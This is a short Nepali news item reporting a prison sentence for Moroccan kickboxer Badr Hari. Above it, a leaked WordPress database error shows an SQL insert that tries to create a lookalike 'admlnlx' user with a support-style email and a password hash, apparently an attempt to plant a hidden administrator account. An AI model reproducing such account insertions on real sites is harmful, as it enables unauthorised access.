WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BdYROR1lSigSZW4Z7LJ.ILsaptQHDQ.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-17 14:56:02', '', 'admlnlx', 'admlnlx')
मोरोक्को, माघ २६-
रियल म्याड्रिडका स्टार क्रिस्टियानो रोनाल्डोका नजिकका मित्र भनिएका मोरोक्कोका किकबक्सर खेलाडी बदर हरीलाई २ वर्षको जेल सजाय सुनाइएको छ ।
मारपीट गरेको आरोपमा ३२ वर्षीय बदरलाई जेल सजाय सुनाइएको हो । उनीसँग रोनाल्डोको समलिंगी सम्बन्ध रहेको भनेर प्रचारसमेत भएको थियो ।बदरका वकिलका अनुसार सजायमध्येको ६ महिना जेलमा बिताउनेछन् ,सन् २०११ र सन् २०१२ मा आम्सटर्डाममा उनीमाथि मारपिटको आरोप लागेको थियो । बदर विश्वकै उत्कृष्ट किक बक्सरको रुपमा चिनिन्छन् ।- एजेन्सी